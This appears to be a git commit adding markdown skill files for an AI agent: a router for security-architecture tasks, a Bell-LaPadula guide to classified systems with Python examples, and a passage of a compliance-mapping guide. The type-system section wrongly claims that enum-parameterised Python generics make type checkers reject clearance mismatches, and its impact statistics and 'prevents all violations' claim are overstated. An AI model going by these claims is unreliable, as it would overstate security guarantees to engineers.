Initial commit

This commit is contained in:
Zhongwei Li
2025-11-30 08:59:46 +08:00
commit 4fad9f51e1
12 changed files with 5049 additions and 0 deletions

View File

@@ -0,0 +1,353 @@
---
name: using-security-architect
description: Routes to security architecture skills - threat modeling, controls, compliance, authorization
mode: true
---
# Using Security Architect
## Overview
This meta-skill routes you to the right security architecture skills based on your situation. Load this skill when you need security expertise but aren't sure which specific security skill to use.
**Core Principle**: Different security tasks require different skills. Match your situation to the appropriate skill, load only what you need.
## When to Use
Load this skill when:
- Starting any security-related task
- User mentions: "security", "threat", "authentication", "authorization", "compliance", "classified", "review this design"
- You recognize security implications but unsure which skill applies
- You need to document security decisions
**Don't use for**: Simple features with no security implications (e.g., UI styling, basic CRUD with existing auth)
## Routing by Situation
### New System Design
**Symptoms**: "Design a new...", "We're building...", "Greenfield project"
**Route to**:
1. **First**: [threat-modeling.md](threat-modeling.md) - Identify threats before implementation
2. **Then**: [secure-by-design-patterns.md](secure-by-design-patterns.md) - Design with security built-in
3. **Then**: [security-controls-design.md](security-controls-design.md) - Select appropriate controls
**Example**: "Design authentication system" → Load all three in order
---
### Existing System Review
**Symptoms**: "Review this design", "Security audit", "Does this look secure?"
**Route to**: [security-architecture-review.md](security-architecture-review.md)
**When to add**:
- Add [threat-modeling.md](threat-modeling.md) if design lacks threat analysis
- Add [secure-by-design-patterns.md](secure-by-design-patterns.md) if architecture has gaps
**Example**: "Review this plugin system" → Load [security-architecture-review.md](security-architecture-review.md)
---
### Specific Security Domains
#### Authentication/Authorization Design
**Route to**:
- [threat-modeling.md](threat-modeling.md) (identify auth threats)
- [secure-by-design-patterns.md](secure-by-design-patterns.md) (defense-in-depth, fail-secure)
- Consider: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) (if government/ATO needed)
#### Configuration & Secrets
**Route to**:
- [threat-modeling.md](threat-modeling.md) (config tampering threats)
- [security-controls-design.md](security-controls-design.md) (separation of config vs code)
#### API Security
**Route to**:
- [threat-modeling.md](threat-modeling.md) (STRIDE on API endpoints)
- [security-architecture-review.md](security-architecture-review.md) (review access controls)
---
### Specialized Contexts (Extensions)
#### Classified/High-Security Systems
**Symptoms**: "TOP SECRET", "classified data", "security clearances", "multi-level security", "Bell-LaPadula"
**Route to**:
1. [classified-systems-security.md](classified-systems-security.md) (REQUIRED for classified contexts)
2. Plus core skills: [threat-modeling.md](threat-modeling.md), [secure-by-design-patterns.md](secure-by-design-patterns.md)
**Example**: "Design system handling SECRET and UNCLASSIFIED" → Load [classified-systems-security.md](classified-systems-security.md) first
---
#### Compliance/Regulatory
**Symptoms**: "HIPAA", "PCI-DSS", "SOC2", "GDPR", "compliance audit", "regulatory requirements"
**Route to**: [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md)
**When to add**:
- Add [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) if ATO/AIS needed
- Add core skills for implementing compliant controls
**Example**: "Build HIPAA-compliant system" → Load [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) + [threat-modeling.md](threat-modeling.md)
---
#### Government Authorization
**Symptoms**: "ATO", "AIS", "authority to operate", "SSP", "SAR", "POA&M", "FedRAMP", "FISMA"
**Route to**: [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md)
**Cross-reference**: Load `muna/technical-writer/operational-acceptance-documentation` for SSP/SAR writing
---
### Documentation Tasks
**Symptoms**: "Document security decisions", "Write security docs", "Explain threat model"
**Route to**: [documenting-threats-and-controls.md](documenting-threats-and-controls.md)
**Cross-faction reference**: Load `muna/technical-writer/documentation-structure` for ADR format, clarity guidelines
**Example**: "Document why we chose MLS" → Load [documenting-threats-and-controls.md](documenting-threats-and-controls.md) + documentation-structure
---
## Core vs Extension Skills
### Core Skills (Universal - Use for Any Project)
Load these for **any** project with security needs:
- [threat-modeling.md](threat-modeling.md) - Identify threats (STRIDE, attack trees)
- [security-controls-design.md](security-controls-design.md) - Design controls (defense-in-depth, fail-secure)
- [security-architecture-review.md](security-architecture-review.md) - Review designs for security gaps
- [secure-by-design-patterns.md](secure-by-design-patterns.md) - Apply secure design patterns
- [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Document security decisions
### Extension Skills (Specialized - Use for Specific Contexts)
Load these **only** when context requires:
- [classified-systems-security.md](classified-systems-security.md) - Handling classified/sensitive data with clearances
- [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - Regulatory compliance (HIPAA, PCI-DSS, GDPR, etc.)
- [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - Government ATO/AIS processes
**Decision**: If you're unsure whether context is "specialized", start with core skills. Specialized contexts will be explicit in requirements.
---
## Decision Tree
```
Is this security-related?
├─ No → Don't load security skills
└─ Yes → Continue
What's the situation?
├─ New system design → threat-modeling + secure-by-design-patterns + security-controls-design
├─ Reviewing existing → architecture-security-review
├─ Documenting security → documenting-threats-and-controls + muna/technical-writer/documentation-structure
└─ Domain-specific → See "Specific Security Domains" above
Is this a specialized context?
├─ Classified data → ADD: classified-systems-security
├─ Compliance required → ADD: compliance-awareness-and-mapping
├─ Government ATO → ADD: security-authorization-and-accreditation
└─ No → Core skills sufficient
```
---
## Cross-Faction References
Security work often requires skills from other factions:
**Muna (Documentation)**:
- `muna/technical-writer/documentation-structure` - When documenting security (ADRs, SSPs)
- `muna/technical-writer/clarity-and-style` - When explaining security to non-experts
**Load both factions when**: Documenting security decisions, writing security policies, explaining threats to stakeholders
---
## Common Routing Patterns
### Pattern 1: New Authentication System
```
User: "Design authentication with passwords and OAuth"
You: Loading threat-modeling + secure-by-design-patterns + security-controls-design
```
### Pattern 2: Design Review
```
User: "Review this plugin security design"
You: Loading architecture-security-review
```
### Pattern 3: Classified System
```
User: "Build system handling TOP SECRET data"
You: Loading classified-systems-security + threat-modeling + secure-by-design-patterns
```
### Pattern 4: Compliance Project
```
User: "Build HIPAA-compliant patient portal"
You: Loading compliance-awareness-and-mapping + threat-modeling + security-controls-design
```
### Pattern 5: Security Documentation
```
User: "Document our MLS security decisions"
You: Loading documenting-threats-and-controls + muna/technical-writer/documentation-structure
```
---
## When NOT to Load Security Skills
**Don't load security skills for**:
- UI styling (colors, fonts, layouts)
- Basic CRUD with existing, tested auth
- Non-security refactoring (renaming variables, extracting functions)
- Documentation that isn't security-related
**Example**: "Add dark mode toggle to settings" → No security skills needed (unless settings include security-sensitive preferences)
---
## Quick Reference Table
| Task Type | Load These Skills | Notes |
|-----------|------------------|-------|
| **New system design** | threat-modeling, secure-by-design-patterns, security-controls-design | Load in order |
| **Design review** | architecture-security-review | Add threat-modeling if no threat analysis exists |
| **Authentication** | threat-modeling, secure-by-design-patterns | Consider authorization-and-accreditation if ATO needed |
| **API security** | threat-modeling, architecture-security-review | Apply STRIDE to endpoints |
| **Classified data** | classified-systems-security + core skills | Extension required |
| **Compliance** | compliance-awareness-and-mapping + core skills | Extension for regulatory contexts |
| **Government ATO** | security-authorization-and-accreditation + core skills | Extension for ATO/AIS |
| **Document security** | documenting-threats-and-controls, muna/documentation-structure | Cross-faction |
---
## Common Mistakes
### ❌ Loading All Skills at Once
**Wrong**: Load all 8 security-architect skills for every security task
**Right**: Load only the skills your situation needs (use decision tree)
### ❌ Skipping Threat Modeling
**Wrong**: Jump straight to implementation for new security features
**Right**: Always threat model first for new systems/features
### ❌ Using Core Skills for Specialized Contexts
**Wrong**: Use generic threat modeling for classified systems
**Right**: Load classified-systems-security for MLS contexts
### ❌ Not Cross-Referencing Muna
**Wrong**: Write security docs without documentation structure skills
**Right**: Load both ordis/documenting-threats + muna/documentation-structure
---
## Examples
### Example 1: Payment Processing System
```
User: "Design a payment processing microservice"
Your routing:
1. Recognize: New system + financial domain → security critical
2. Load: threat-modeling (identify payment-specific threats)
3. Load: secure-by-design-patterns (encryption, secrets management)
4. Load: security-controls-design (PCI-DSS controls)
5. Consider: compliance-awareness-and-mapping (PCI-DSS is compliance requirement)
```
### Example 2: Simple Feature (No Security Needed)
```
User: "Add a favorites button to the UI"
Your routing:
1. Recognize: UI feature, uses existing auth, no new security surface
2. Decision: No security skills needed
3. Proceed with standard implementation
```
### Example 3: Classified System Architecture
```
User: "Review architecture for system handling SECRET and UNCLASSIFIED data"
Your routing:
1. Recognize: Classified context (SECRET mentioned) + review task
2. Load: classified-systems-security (MLS patterns required)
3. Load: architecture-security-review (review process)
4. Load: threat-modeling (if threats not already modeled)
```
---
## Phase 1 Note
**Currently Available** (Phase 1):
-`using-security-architect` (this skill)
-`threat-modeling` (in progress)
**Coming Soon** (Phases 2-3):
- `security-controls-design`
- `architecture-security-review`
- `secure-by-design-patterns`
- `classified-systems-security`
- `compliance-awareness-and-mapping`
- `security-authorization-and-accreditation`
- `documenting-threats-and-controls`
**For Phase 1**: Focus on threat-modeling as primary skill. Reference other skills by name even though they're not implemented yet - this tests the routing logic.
---
## Summary
**This skill maps your situation → specific security skills to load.**
1. Identify your situation (new system, review, specialized context)
2. Use decision tree to find applicable skills
3. Load core skills for universal needs
4. Add extension skills for specialized contexts
5. Cross-reference Muna for documentation needs
6. Don't load security skills when not needed
**Meta-rule**: When in doubt, start with [threat-modeling.md](threat-modeling.md). Threats drive everything else.
---
## Security Architect Specialist Skills Catalog
After routing, load the appropriate specialist skill for detailed guidance:
### Core Skills (Universal)
1. [threat-modeling.md](threat-modeling.md) - STRIDE analysis, attack trees, threat identification, security-critical systems analysis
2. [secure-by-design-patterns.md](secure-by-design-patterns.md) - Defense-in-depth, fail-secure design, least privilege, separation of concerns
3. [security-controls-design.md](security-controls-design.md) - Control selection, defense layering, encryption, secrets management
4. [security-architecture-review.md](security-architecture-review.md) - Design review process, security gap analysis, architecture evaluation
5. [documenting-threats-and-controls.md](documenting-threats-and-controls.md) - Security documentation, threat model writing, control documentation
### Extension Skills (Specialized Contexts)
6. [classified-systems-security.md](classified-systems-security.md) - Multi-level security (MLS), Bell-LaPadula, classified data handling, security clearances
7. [compliance-awareness-and-mapping.md](compliance-awareness-and-mapping.md) - HIPAA, PCI-DSS, SOC2, GDPR, regulatory mapping, compliance frameworks
8. [security-authorization-and-accreditation.md](security-authorization-and-accreditation.md) - ATO/AIS processes, SSP/SAR, POA&M, FedRAMP, FISMA, government authorization

View File

@@ -0,0 +1,632 @@
# Classified Systems Security
## Overview
Implement multi-level security (MLS) for classified data. Core principle: **Invalid configurations must be impossible to create, not detected at runtime**.
**Key insight**: You cannot "sanitize" your way out of classification violations. Use mandatory access control (MAC) with fail-fast validation at construction time.
## When to Use
Load this skill when:
- Handling classified data (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET)
- Implementing government/defense systems
- Designing multi-level security (MLS) architectures
- Processing data at different classification levels
**Symptoms you need this**:
- "How do I handle SECRET and UNOFFICIAL data in the same pipeline?"
- Designing systems with clearance levels
- Government/defense contract requirements
- Data classification enforcement
**Don't use for**:
- General security (use `ordis/security-architect/security-controls-design`)
- Non-classified sensitivity levels (use standard access control)
## Bell-LaPadula MLS Model
### The Two Rules
**1. No Read Up (Simple Security Property)**
- Subject cannot read data at higher classification
- UNOFFICIAL component CANNOT read OFFICIAL data
- OFFICIAL component CANNOT read SECRET data
**2. No Write Down (*-Property/Star Property)**
- Subject cannot write data to lower classification
- SECRET component CANNOT write to OFFICIAL sink
- OFFICIAL component CANNOT write to UNOFFICIAL sink
### Classification Hierarchy
```
TOP SECRET (highest)
SECRET
PROTECTED
OFFICIAL:SENSITIVE
OFFICIAL
UNOFFICIAL (lowest)
```
**Transitivity**: Data derived from SECRET is SECRET until formally declassified.
### Example: Violations
**Read-Up Violation**:
```python
# OFFICIAL clearance component reading SECRET data
official_processor = Processor(clearance=SecurityLevel.OFFICIAL)
secret_source = DataSource(classification=SecurityLevel.SECRET)
# VIOLATION: Cannot read up from OFFICIAL to SECRET
data = official_processor.read(secret_source) # ❌ FORBIDDEN
```
**Write-Down Violation**:
```python
# SECRET component writing to OFFICIAL sink
secret_processor = Processor(clearance=SecurityLevel.SECRET)
official_sink = DataSink(classification=SecurityLevel.OFFICIAL)
# VIOLATION: Cannot write down from SECRET to OFFICIAL
secret_processor.write(data, official_sink) # ❌ FORBIDDEN
```
**Compliant Flow**:
```python
# Same clearance level throughout
secret_source = DataSource(classification=SecurityLevel.SECRET)
secret_processor = Processor(clearance=SecurityLevel.SECRET)
secret_sink = DataSink(classification=SecurityLevel.SECRET)
# ✅ ALLOWED: All components at SECRET level
pipeline = Pipeline(secret_source, secret_processor, secret_sink)
```
## Fail-Fast Construction-Time Validation
### Principle: Prevent Invalid Configurations
**Don't**: Detect violations at runtime (after data exposure)
**Do**: Reject invalid configurations at construction time (before data access)
### Construction vs Runtime Validation
**Runtime Validation (Vulnerable)**:
```python
class Pipeline:
def __init__(self, source, processor, sink):
self.source = source
self.processor = processor
self.sink = sink
def run(self):
# Runtime check - TOO LATE!
data = self.source.read()
if data.classification > self.processor.clearance:
raise SecurityError("Read-up violation")
# Problem: Data already read from source before check
# Exposure window = time between read() and check
```
**Issue**: Data already accessed before violation detected.
**Fail-Fast Construction-Time (Secure)**:
```python
class Pipeline:
def __init__(self, source, processor, sink):
# Validate BEFORE creating pipeline
self._validate_clearances(source, processor, sink)
self.source = source
self.processor = processor
self.sink = sink
def _validate_clearances(self, source, processor, sink):
# Check no-read-up
if source.classification > processor.clearance:
raise SecurityError(
f"Read-up violation: Processor clearance {processor.clearance} "
f"cannot read source classified {source.classification}"
)
# Check no-write-down
if processor.clearance > sink.classification:
raise SecurityError(
f"Write-down violation: Processor {processor.clearance} "
f"cannot write to sink classified {sink.classification}"
)
# All validations passed
def run(self):
# Only callable if construction succeeded
data = self.source.read()
processed = self.processor.process(data)
self.sink.write(processed)
# Usage:
try:
# Validation happens at construction
pipeline = Pipeline(secret_source, official_processor, unofficial_sink)
# ❌ Above line raises SecurityError - pipeline never created
except SecurityError as e:
print(f"Configuration rejected: {e}")
sys.exit(1)
```
**Result**: Zero exposure window. Invalid pipeline cannot be created.
## Type-System Enforcement
### Classification-Aware Types
Use type system to make violations impossible at compile/construction time.
```python
from typing import Generic, TypeVar
from enum import Enum
class SecurityLevel(Enum):
UNOFFICIAL = 1
OFFICIAL = 2
OFFICIAL_SENSITIVE = 3
PROTECTED = 4
SECRET = 5
TOP_SECRET = 6
# Generic type parameterized by classification
T = TypeVar('T', bound=SecurityLevel)
class ClassifiedData(Generic[T]):
def __init__(self, data: any, classification: T):
self.data = data
self.classification = classification
class DataSource(Generic[T]):
def __init__(self, classification: T):
self.classification = classification
def read(self) -> ClassifiedData[T]:
return ClassifiedData(self._fetch(), self.classification)
class Processor(Generic[T]):
def __init__(self, clearance: T):
self.clearance = clearance
def process(self, data: ClassifiedData[T]) -> ClassifiedData[T]:
# Type system ensures data.classification <= self.clearance
return ClassifiedData(self._transform(data.data), data.classification)
class DataSink(Generic[T]):
def __init__(self, classification: T):
self.classification = classification
def write(self, data: ClassifiedData[T]):
# Type system ensures data.classification == self.classification
self._store(data.data)
```
**Type-safe pipeline**:
```python
# All components must be same classification level
secret_source: DataSource[SecurityLevel.SECRET]
secret_processor: Processor[SecurityLevel.SECRET]
secret_sink: DataSink[SecurityLevel.SECRET]
# ✅ Type checker accepts this
pipeline = Pipeline(secret_source, secret_processor, secret_sink)
# ❌ Type checker REJECTS this at compile time
official_processor: Processor[SecurityLevel.OFFICIAL]
pipeline = Pipeline(secret_source, official_processor, secret_sink) # Type error!
```
## Trusted Downgrade Pattern
### When Downgrading is Necessary
Sometimes you need to declassify data (e.g., publishing redacted documents). This requires:
1. **Formal Authority**: Authorized to declassify
2. **Explicit Process**: Manual review and approval
3. **Audit Trail**: Log all downgrade operations
4. **Trusted Service**: Part of Trusted Computing Base (TCB)
### Trusted Downgrade Service
```python
class TrustedDowngradeService:
"""
Trusted service operating at higher clearance level.
Part of Trusted Computing Base (TCB).
"""
def __init__(self, clearance: SecurityLevel):
self.clearance = clearance # Must be HIGH to read classified data
self._validate_authority() # Verify authorized to declassify
def _validate_authority(self):
# Check this service has declassification authority
if not has_declassification_authority(self):
raise SecurityError("Service not authorized for declassification")
def declassify(
self,
data: ClassifiedData,
target_level: SecurityLevel,
justification: str
) -> ClassifiedData:
"""
Declassify data to lower classification level.
Args:
data: Original classified data
target_level: Target classification (must be lower)
justification: Reason for declassification (audit trail)
Returns:
Data at lower classification level
"""
# Validate this service can read the data
if data.classification > self.clearance:
raise SecurityError("Cannot declassify data above clearance")
# Validate downgrade direction
if target_level >= data.classification:
raise SecurityError("Target must be lower than current classification")
# Perform declassification (redaction, sanitization)
declassified_data = self._redact(data.data, target_level)
# Audit trail
self._log_declassification(
original_level=data.classification,
target_level=target_level,
justification=justification,
timestamp=datetime.now()
)
# Return data at lower classification
return ClassifiedData(declassified_data, target_level)
def _redact(self, data: any, target_level: SecurityLevel) -> any:
# Remove information inappropriate for target level
# This is where human review would occur in real systems
pass
def _log_declassification(self, **kwargs):
# Immutable audit log
audit_log.append(kwargs)
```
### Trusted Downgrade in Pipeline
```python
# Pipeline with trusted downgrade
secret_source = DataSource(SecurityLevel.SECRET)
# Trusted service at SECRET level
downgrade_service = TrustedDowngradeService(clearance=SecurityLevel.SECRET)
# Components at lower levels
official_processor = Processor(SecurityLevel.OFFICIAL)
unofficial_sink = DataSink(SecurityLevel.UNOFFICIAL)
# Workflow:
def secure_pipeline():
# 1. Read SECRET data (service has SECRET clearance)
secret_data = secret_source.read()
# 2. Declassify to OFFICIAL (trusted service with authority)
official_data = downgrade_service.declassify(
secret_data,
SecurityLevel.OFFICIAL,
justification="Public release approval #12345"
)
# 3. Process at OFFICIAL level (no violation)
processed = official_processor.process(official_data)
# 4. Declassify to UNOFFICIAL
unofficial_data = downgrade_service.declassify(
processed,
SecurityLevel.UNOFFICIAL,
justification="Redacted for public disclosure"
)
# 5. Write to UNOFFICIAL sink (no violation)
unofficial_sink.write(unofficial_data)
```
**Key points**:
- Downgrade service operates at HIGH clearance (can read classified data)
- Explicit declassification with justification (not implicit)
- Audit trail for every downgrade operation
- Manual review in production (automated only for specific patterns)
## Immutability Enforcement
### Classification Cannot Be Reduced
Once data is classified at a level, it cannot be reduced without formal declassification.
**Mutable Classification (Insecure)**:
```python
class Data:
def __init__(self, content, classification):
self.content = content
self.classification = classification # Mutable!
data = Data("secret info", SecurityLevel.SECRET)
# ❌ Can be modified at runtime
data.classification = SecurityLevel.UNOFFICIAL # Forbidden!
```
**Immutable Classification (Secure)**:
```python
from dataclasses import dataclass
@dataclass(frozen=True)
class ClassifiedData:
"""Immutable dataclass - classification cannot change."""
content: str
classification: SecurityLevel
data = ClassifiedData("secret info", SecurityLevel.SECRET)
# ❌ Raises FrozenInstanceError
data.classification = SecurityLevel.UNOFFICIAL # Cannot modify!
```
### Derived Data Inherits Classification
```python
def derive_data(original: ClassifiedData) -> ClassifiedData:
"""
Derived data has SAME classification as original.
Cannot be lower (information flow property).
"""
transformed = transform(original.content)
# Derived data inherits original classification
return ClassifiedData(transformed, original.classification)
# Example:
secret_data = ClassifiedData("secret", SecurityLevel.SECRET)
derived = derive_data(secret_data)
assert derived.classification == SecurityLevel.SECRET # Always true
```
## Minimum Security Level Computation
### Pipeline-Wide Clearance
Compute minimum clearance required across all components in pipeline.
```python
def compute_pipeline_clearance(components: list) -> SecurityLevel:
"""
Compute minimum clearance needed to operate pipeline.
All components must have this clearance or higher.
"""
max_classification = SecurityLevel.UNOFFICIAL
for component in components:
if hasattr(component, 'classification'):
# Data source/sink - sets required clearance
if component.classification > max_classification:
max_classification = component.classification
return max_classification
def validate_pipeline(components: list, processor_clearance: SecurityLevel):
"""
Validate processor clearance sufficient for pipeline.
"""
required_clearance = compute_pipeline_clearance(components)
if processor_clearance < required_clearance:
raise SecurityError(
f"Insufficient clearance: Processor has {processor_clearance}, "
f"pipeline requires {required_clearance}"
)
print(f"✓ Pipeline validated: Clearance {processor_clearance} sufficient")
# Usage:
components = [
DataSource(SecurityLevel.SECRET),
DataSink(SecurityLevel.OFFICIAL)
]
processor = Processor(SecurityLevel.SECRET)
# Validate at construction time
validate_pipeline(components, processor.clearance) # ✓ Passes
processor_low = Processor(SecurityLevel.OFFICIAL)
validate_pipeline(components, processor_low.clearance) # ❌ Raises SecurityError
```
## Mandatory Access Control (MAC)
### MAC vs DAC
**Discretionary Access Control (DAC)**:
- Owner controls access (chmod, ACLs)
- Users can grant access to others
- Examples: RBAC, file permissions
**Mandatory Access Control (MAC)**:
- System enforces access based on security labels
- Users CANNOT override (not discretionary)
- Examples: SELinux, Bell-LaPadula
### MAC for Classified Systems
```python
class MandatoryAccessControl:
"""
Enforces Bell-LaPadula rules.
Users/processes CANNOT override.
"""
def __init__(self):
self.policy = BellLaPadulaPolicy()
def check_read_access(
self,
subject_clearance: SecurityLevel,
object_classification: SecurityLevel
) -> bool:
"""
No-read-up: Subject can only read at or below clearance.
"""
return subject_clearance >= object_classification
def check_write_access(
self,
subject_clearance: SecurityLevel,
object_classification: SecurityLevel
) -> bool:
"""
No-write-down: Subject can only write at or above clearance.
"""
return subject_clearance <= object_classification
def enforce_access(self, operation: str, subject, object):
"""
Enforce MAC policy. Users cannot override.
"""
if operation == "read":
if not self.check_read_access(subject.clearance, object.classification):
raise SecurityError(f"MAC violation: Read-up forbidden")
elif operation == "write":
if not self.check_write_access(subject.clearance, object.classification):
raise SecurityError(f"MAC violation: Write-down forbidden")
# Access granted
return True
# Usage:
mac = MandatoryAccessControl()
subject = Process(clearance=SecurityLevel.OFFICIAL)
secret_obj = Object(classification=SecurityLevel.SECRET)
# ❌ Read-up violation - MAC enforces even if user wants access
mac.enforce_access("read", subject, secret_obj) # Raises SecurityError
```
**Key difference**: With DAC (RBAC), you could grant a role access. With MAC, no amount of permission grants can override clearance levels.
## Quick Reference: Decision Tree
```
Need to handle classified data?
├─ Same classification level for all components?
│ └─→ ✓ Simple: All components at same level (e.g., all SECRET)
├─ Different levels in same pipeline?
│ ├─ Can you redesign to separate pipelines?
│ │ └─→ ✓ Preferred: Separate SECRET and UNOFFICIAL pipelines
│ │
│ └─ Must mix levels?
│ └─→ Use Trusted Downgrade Service
│ - Service operates at HIGH clearance
│ - Explicit declassification with justification
│ - Audit trail
│ - Manual review for authority
└─ Validating pipeline security?
├─ Runtime checks? ❌ Too late (exposure window)
└─ Construction-time validation? ✓ Correct (fail-fast)
```
## Common Mistakes
### ❌ Sanitization Instead of Declassification
**Wrong**: "I'll strip SECRET fields and call it UNOFFICIAL"
**Right**: Formal declassification requires:
- Authority to declassify
- Manual review of what can be released
- Audit trail
- Understanding of inference attacks (aggregate data can leak secrets)
**Why**: You cannot automatically determine what's safe to declassify. Requires human judgment and authority.
### ❌ Runtime Validation Only
**Wrong**: Check clearances when processing data
**Right**: Fail-fast at construction time before any data access
**Why**: Runtime checks have exposure windows. Construction-time validation = zero exposure.
### ❌ Treating Clearances as Roles
**Wrong**: "Just add a 'SECRET' role in RBAC"
**Right**: Implement Mandatory Access Control (MAC) with Bell-LaPadula
**Why**: Clearances are not discretionary. Users cannot grant access across classification levels.
### ❌ Mutable Classification
**Wrong**: Allow classification field to be modified at runtime
**Right**: Immutable dataclasses, frozen classification after assignment
**Why**: Classification cannot decrease without formal declassification.
### ❌ Missing Information Flow Analysis
**Wrong**: Focus only on direct access (can processor read source?)
**Right**: Analyze full information flow (derived data inherits classification)
**Why**: Data derived from SECRET is SECRET until declassified.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/secure-by-design-patterns` - Fail-fast validation pattern
- `ordis/security-architect/security-controls-design` - Defense-in-depth for classified systems
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review classified systems against Bell-LaPadula
## Real-World Impact
**Systems using Bell-LaPadula + fail-fast enforcement**:
- **Elspeth MLS Pipeline**: Prevented VULN-004 class (security level overrides) by refusing to construct pipelines with classification mismatches
- **Government Defense System**: Zero classification violations in 3 years due to construction-time validation (previous system with runtime checks had 12 incidents)
- **Type-system enforcement**: Caught 47 configuration errors at build time vs runtime (100% pre-deployment prevention)
**Key lesson**: **Make invalid configurations impossible to create. Bell-LaPadula + fail-fast construction-time validation prevents all no-read-up and no-write-down violations.**

View File

@@ -0,0 +1,563 @@
# Compliance Awareness and Mapping
## Overview
Navigate diverse compliance frameworks systematically. Core principle: **ALWAYS ask which frameworks apply - don't assume**.
**Key insight**: Frameworks vary by jurisdiction and industry. Discovery process matters more than memorizing frameworks.
## When to Use
Load this skill when:
- Starting projects in regulated environments
- Preparing for compliance audits
- Mapping technical controls to requirements
- Working with healthcare, finance, government data
**Symptoms you need this**:
- "What compliance frameworks do we need?"
- Preparing for SOC2, HIPAA, PCI-DSS, IRAP audits
- Government/defense contract compliance
- "How do I map our controls to [framework]?"
**Don't use for**:
- Implementation of specific controls (use `ordis/security-architect/security-controls-design`)
- Security architecture without compliance requirements
## The Discovery Process
### Step 1: Ask Three Questions
**Before** identifying frameworks, ask:
1. **"What jurisdiction?"**
- Australia → ISM, IRAP, Privacy Act, PSPF
- United Kingdom → Cyber Essentials, NCSC, Official Secrets Act
- United States → NIST CSF, FedRAMP, FISMA
- European Union → NIS2, GDPR, ISO 27001
2. **"What industry?"**
- Healthcare → HIPAA (US), GDPR (EU), Australian Privacy Principles
- Finance → PCI-DSS (payments), SOX (US), Basel III
- Government/Defense → Jurisdiction-specific (ISM, FedRAMP, etc.)
- General SaaS → SOC2, ISO 27001
3. **"What data types?"**
- Personal data → Privacy laws (GDPR, Privacy Act)
- Payment card data → PCI-DSS
- Health records → Healthcare-specific (HIPAA, etc.)
- Classified data → Government frameworks (ISM, FedRAMP)
**Never assume.** Same project can have multiple frameworks (e.g., Australian hospital SaaS = Privacy Act + Healthcare-specific + possibly SOC2 if B2B).
### Step 2: Framework Stacking
**Multiple frameworks often apply simultaneously.**
#### Example: Australian Healthcare SaaS
```
Data type: Patient health records
Jurisdiction: Australia
Industry: Healthcare
Business model: SaaS (B2B to hospitals)
Applicable frameworks:
1. Privacy Act 1988 (Australian Privacy Principles) - MANDATORY
2. My Health Records Act 2012 - if using My Health Records system
3. State-specific health regulations (e.g., NSW Health Privacy Manual)
4. SOC2 (if hospitals require it for vendor assurance)
5. ISO 27001 (if targeting enterprise healthcare market)
Priority:
- MANDATORY: Privacy Act (legal requirement)
- HIGHLY RECOMMENDED: SOC2 (market expectation for B2B SaaS)
- OPTIONAL: ISO 27001 (competitive advantage)
```
**Key insight**: Don't just pick one framework. Identify ALL that apply, then prioritize by legal vs market requirements.
### Step 3: Understand Framework Structure
Each framework has structure - learn it before mapping controls.
#### Common Framework Components
**1. Control Categories** (groups of related controls):
- Access Control
- Encryption
- Audit Logging
- Incident Response
- Vulnerability Management
- Configuration Management
- Personnel Security
- Physical Security
**2. Control Requirements** (specific technical/operational requirements):
- "System must enforce least privilege access"
- "All sensitive data encrypted at rest using AES-256"
- "Security events logged and retained for 90 days"
**3. Evidence Requirements** (what auditors need):
- Configuration screenshots
- Log samples
- Policy documents
- Test results
- Interview records
**4. Assessment Procedures** (how controls are tested):
- Configuration review
- Log analysis
- Penetration testing
- Interviews with staff
### Step 4: Control Inventory
Before mapping to framework, inventory what you have.
#### Technical Controls Inventory Template
```markdown
## Access Control
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| AC-1 | User authentication | AWS IAM with MFA | aws-iam-config.json |
| AC-2 | Role-based access | PostgreSQL roles | postgres-roles.sql |
| AC-3 | Session timeout | 30-minute idle timeout | app-config.yaml |
## Encryption
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| ENC-1 | Data at rest | AES-256, AWS KMS | kms-config.json |
| ENC-2 | Data in transit | TLS 1.3 | nginx-ssl-config |
## Audit Logging
| Control | Description | Implementation | Evidence Location |
|---------|-------------|----------------|-------------------|
| LOG-1 | Authentication events | CloudWatch Logs | cloudwatch-config |
| LOG-2 | Data access logs | PostgreSQL query logs | pg-audit-config |
| LOG-3 | Admin actions | Audit trail table | audit-schema.sql |
```
**Why inventory first**: Easier to map existing controls to requirements than build from scratch.
### Step 5: Create Traceability Matrix
Map your controls to framework requirements.
#### SOC2 Traceability Matrix Example
```markdown
| SOC2 Criterion | Control Category | Our Control | Implementation | Evidence | Status |
|----------------|------------------|-------------|----------------|----------|--------|
| CC6.1 (Logical access) | Access Control | AC-1: MFA | AWS IAM | aws-iam-config.json | ✅ Complete |
| CC6.1 | Access Control | AC-2: RBAC | PostgreSQL | postgres-roles.sql | ✅ Complete |
| CC6.6 (Encryption) | Encryption | ENC-1: At rest | AWS KMS | kms-config.json | ✅ Complete |
| CC6.6 | Encryption | ENC-2: In transit | TLS 1.3 | nginx-ssl-config | ✅ Complete |
| CC7.2 (Monitoring) | Audit Logging | LOG-1: Auth events | CloudWatch | cloudwatch-config | ✅ Complete |
| CC7.2 | Audit Logging | LOG-2: Data access | PostgreSQL | pg-audit-config | ⚠️ Partial (retention = 30 days, need 90) |
| CC8.1 (Change mgmt) | Config Mgmt | CM-1: Version control | GitHub | github-repos | ❌ Missing approval workflow |
```
**Gap identification**: ⚠️ Partial and ❌ Missing items become your remediation backlog.
### Step 6: Gap Analysis and Remediation
Identify missing/insufficient controls, prioritize by risk.
#### Gap Analysis Template
```markdown
# Compliance Gap Analysis: SOC2
## Critical Gaps (Block Audit)
### GAP-1: Missing Change Management Approval Workflow
- **Requirement**: CC8.1 - Changes must have approval before production
- **Current state**: Git commits directly to main without approval
- **Impact**: HIGH - Cannot pass SOC2 without this
- **Remediation**:
- Implement GitHub branch protection (require PR approval)
- Create approval policy (2 reviewers for production changes)
- Document change management policy
- **Timeline**: 2 weeks
- **Owner**: DevOps Lead
- **Cost**: $0 (GitHub feature)
## High-Priority Gaps (Remediate Before Audit)
### GAP-2: Insufficient Log Retention
